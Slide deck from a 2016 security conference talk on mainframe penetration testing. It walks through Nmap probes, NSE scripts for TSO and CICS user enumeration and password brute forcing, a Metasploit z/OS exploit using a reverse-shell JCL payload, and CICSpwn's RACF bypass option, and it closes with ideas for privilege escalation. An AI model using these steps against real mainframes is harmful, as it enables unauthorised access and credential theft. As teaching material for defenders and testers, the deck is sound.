
VANGUARD SECURITY & COMPLIANCE 2016

Philip Young

ZedSec 390

CST08

Advanced Mainframe Hacking

SECURITY & COMPLIANCE CONFERENCE 2016


Disclaimer

I’m not here in the name of or on behalf of my employer. All opinions expressed here are my own.

Trademarks

The following are trademarks or registered trademarks of the International Business Machines Corporation: CICS, CICSPlex, DB2, eServer, IBM, IBM z, IBM z Systems, IBM z13, S/390, System z, System z9, System z10, System/390, VTAM, WebSphere, z Systems, z9, z10, z13, z/Architecture, z/OS, z/VM, zEnterprise, IMS, MQSeries, MVS, NetView, OS/390, Parallel Sysplex, RACF, RMF.

Java and all Java-based trademarks are trademarks of Oracle and/or its affiliates.

UNIX is a registered trademark of The Open Group in the United States and other countries.

Microsoft, Windows and Windows NT are registered trademarks of Microsoft Corporation.

Linux® is the registered trademark of Linus Torvalds in the U.S. and other countries.

Kali Linux is a trademark of Offensive Security.

macOS is a trademark of Apple Inc.

Metasploit is a registered trademark of Rapid7 LLC.

VMware is a registered trademark of VMware, Inc.

Other company, product and service names may be trademarks or service marks of others.

About Me!

Purpose

This session will:

• Go over the tools introduced in yesterday's keynote

• Explain what's going on behind the scenes

• Show you how to use the tools


Tools Covered

• Nmap

• Metasploit

• CICSpwn

• Python (NJE/TN3270 Library)

• John the Ripper

• BIRP

Platform

• Linux (Kali Linux)

• VMware

• macOS

• VPS

Kali Linux

• A Linux distribution

• Comes pre-loaded with multiple tools:

  • Burp
  • Metasploit
  • BeEF
  • Many more

Nmap

• Network MAP

• Uses various techniques to discover open ports

• E.g. "SYN scan"


Service Probes

• Identify what is running on a port

• Uses TCP/UDP probes


Nmap

• Created in 1997

• By: Fyodor

• Mostly ‘C’

• Includes Service Detection

• Added Scripting Engine in ‘07

Nmap Probes

• Use the flag: '-sV'

• Null Probe: matches the data a service sends to Nmap on connect (Nmap sends nothing first)

• Approx 4,000 'Null Probes'

Let's look at TN3270*:

    match tn3270 m|^\xff\xfd\x1d| p/IBM Telnet TN3270/ i/3270-REGIME/

* line 4606 in nmap-service-probes

TN3270 Null Probe

match                 -> 'Match the following'

tn3270                -> 'with tn3270'

m|^\xff\xfd\x1d|      -> the regular expression the received data must match

\xff\xfd\x1d          = IAC DO TN3270E

p/IBM Telnet TN3270/  = set the product field to 'IBM Telnet…'

Other Probes

• TCP Probes

• Send data, inspect the reply

• For example, the Network Job Entry probe:

NJE Probe

• Sends an invalid NJE 'OPEN' packet

• Waits for either 'ACK' or 'NAK' in EBCDIC

[Screenshot: Nmap without service probes]

[Screenshot: Nmap WITH service probes]
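As an added Python example for the two probe slides above (it is not code from the talk, from Nmap or from the zedsec390 scripts), here is the heart of what -sV does with a match line: it parses the tn3270 entry quoted earlier plus an nje entry constructed to look for the EBCDIC ACK/NAK reply, applies them to constructed replies, and labels the Telnet option bytes by their IANA option numbers. The nje match line, the sample replies and the function names are assumptions made for illustration.

```python
import re
# Telnet option numbers from the IANA Telnet option registry (3270-REGIME: RFC 1041, TN3270E: RFC 2355).
IAC = 0xFF
TELNET_CMDS = {0xFB: "WILL", 0xFC: "WONT", 0xFD: "DO", 0xFE: "DONT"}
TELNET_OPTIONS = {0x00: "BINARY", 0x18: "TERMINAL-TYPE", 0x19: "EOR", 0x1D: "3270-REGIME", 0x28: "TN3270E"}

# Entries in nmap-service-probes 'match' syntax. The tn3270 line is the one quoted on the slide; the
# nje line is constructed for this example (EBCDIC "ACK" = C1 C3 D2, "NAK" = D5 C1 D2), not copied from Nmap.
MATCH_LINES = [
    r"match tn3270 m|^\xff\xfd\x1d| p/IBM Telnet TN3270/ i/3270-REGIME/",
    r"match nje m=^(\xc1\xc3\xd2|\xd5\xc1\xd2)= p/IBM Network Job Entry/",
]

MATCH_RE = re.compile(r"^match (\S+) m(.)(.*?)\2(\w*)(.*)$")
FIELD_RE = re.compile(r"\s([pivhod])(.)(.*?)\2")  # version fields such as p/…/ i/…/ v/…/

def parse_match_line(line):
    """Split one 'match' line into service name, compiled regex and its p/i fields."""
    service, delim, pattern, flags, rest = MATCH_RE.match(line).groups()
    reflags = (re.I if "i" in flags else 0) | (re.S if "s" in flags else 0)
    fields = {key: value for key, _, value in FIELD_RE.findall(rest)}
    # Nmap regexes are byte-oriented; the re module resolves the \xNN escapes itself.
    return {"service": service, "regex": re.compile(pattern.encode("latin-1"), reflags),
            "product": fields.get("p"), "info": fields.get("i")}

PROBE_TABLE = [parse_match_line(line) for line in MATCH_LINES]

def identify(reply: bytes):
    """First entry whose regex matches wins, as in Nmap -sV. Returns (service, product, info) or None."""
    for entry in PROBE_TABLE:
        if entry["regex"].search(reply):
            return entry["service"], entry["product"], entry["info"]
    return None

def decode_negotiation(reply: bytes):
    """Label the leading IAC <cmd> <option> triples of a TN3270 banner, e.g. ['DO 3270-REGIME']."""
    labels, i = [], 0
    while i + 2 < len(reply) and reply[i] == IAC and reply[i + 1] in TELNET_CMDS:
        option = TELNET_OPTIONS.get(reply[i + 2], f"option {reply[i + 2]}")
        labels.append(f"{TELNET_CMDS[reply[i + 1]]} {option}")
        i += 3
    return labels

def ebcdic_text(reply: bytes):
    """NJE replies are EBCDIC: cp037 turns b'\\xd5\\xc1\\xd2' plus padding into 'NAK'."""
    return reply.decode("cp037").rstrip()

# Constructed sample replies, not captures from a real system.
TN3270_BANNER = b"\xff\xfd\x1d\xff\xfd\x28"   # IAC DO 3270-REGIME, IAC DO TN3270E
NJE_REPLY = b"\xd5\xc1\xd2" + b"\x40" * 5     # EBCDIC "NAK" padded with EBCDIC spaces
```

Running identify() over TN3270_BANNER returns the tn3270 entry with product 'IBM Telnet TN3270', and over NJE_REPLY the constructed nje entry; a reply matching no entry returns None, which is what an unrecognised service looks like in Nmap output.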

Nmap Scripting Engine (NSE)

• Composed of libraries and scripts

• Over 530 scripts available

• 121 libraries

• Uses Lua

NSE Categories

auth, broadcast, brute, default, discovery, dos, exploit, external, fuzzer, intrusive, malware, safe, version, vuln

TN3270 NSE Library

• A 'virtual' TN3270 terminal written in Lua

• Available: https://github.com/zedsec390/NMAP

• Allows for the following:

Invoke

• To invoke scripts use the flag --script (\ is line continuation in Linux):

    nmap -sV \
      --script tn3270-screen

Additional TN3270 Scripts

• VTAM® Applid Enumeration

• TSO:
  • User ID Enumeration
  • Password Brute Force

• CICS®:
  • Transaction Enumeration
  • User ID Enumeration
  • User Password Brute Forcing

TSO User Enumeration

• Let's walk through the arguments:

• Note the libraries: brute & unpwdb

Argument                      Definition
brute.maxthreads=100          Max number of concurrent connections. Set to 100.
userdb='/tmp/users.txt'       File with usernames you want to test.
tso-enum.commands='TSOL5'     The command used to get to TSO.

CICS Transaction Enumeration

Argument                      Definition
brute.maxthreads=100          Max number of concurrent connections. Set to 100.
idlist='/tmp/users.txt'       File with CICS transactions you're looking for.
cics-enum.commands='CICSTS29' The command used to get to the CICS region.
cics-enum.path='/home/test'   Successfully identified transaction screenshots will be placed in this folder.

Metasploit Framework

• Developed by H.D. Moore in 2003

• Moved to Ruby in 2007

• Created an easy-to-use exploit platform

• Chad Rikansrud (@bigendiansmalls) added JCL and z/OS® architecture support in 2016

Using MSF

• Run 'msfconsole'

• To list all exploits: show exploits

• Run the only z/OS 'exploit': use exploit/mainframe/ftp/ftp_jcl_creds

• Show the options with: show options

• Fill in the options you need

• Select which 'payload' you want to use

Set Options

• Exploit options:

Option     Definition
FTPUSER    User ID to use.
FTPPASS    Password to use.
RHOST      FTP hostname/IP address of the target LPAR.
RPORT      FTP port (use Nmap).

Metasploit Payload Options

Now select a payload: set payload cmd/mainframe/reverse_shell_jcl

Change the payload options:

Option     Definition
LHOST      Our hostname or IP address.
LPORT      The port you want Metasploit to open a listener on.

CICSpwn

• Released this year by Ayoul

• Relies on CEMT/CEDA transaction IDs (for now)

• Uses CEMT to upload and execute JCL/REXX

• Can be used to assess CICS and break in to environments

• Requires Python 2.7

Interesting Options

Invoke with: python cicspwn

Flag       Definition
-i         Gather information
-A         Test all options
-s         Upload JCL to be executed by the CICS user (requires CEMT)
--bypass   Will bypass RACF® if CEDA is available.

Where To From Here?


Escalation

• So far only network based

• What happens after access is granted?


Some Ideas

• Storage ‘scrapers’ to gather system information (think ‘IPLINFO’ but built in to metasploit)

• Automated APF tools to attempt privilege escalation through zapping APF authorized modules

• Data dumping tools to grab all datasets

• SMP/E corruption

Why Not?

• Make your own tools?

I'd prefer the tools come with what the experts need, so they have it without knowing about it

Contact:

mainframed767@gmail.com

@mainframed767

Thank you!